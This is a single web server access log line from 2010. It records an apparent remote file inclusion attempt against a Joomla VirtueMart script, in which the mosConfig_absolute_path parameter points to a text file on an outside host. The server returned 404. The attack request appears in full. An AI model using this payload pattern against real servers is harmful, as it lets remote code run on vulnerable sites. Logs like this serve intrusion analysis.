65.60.10.18 - - [25/Feb/2010:10:09:41 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
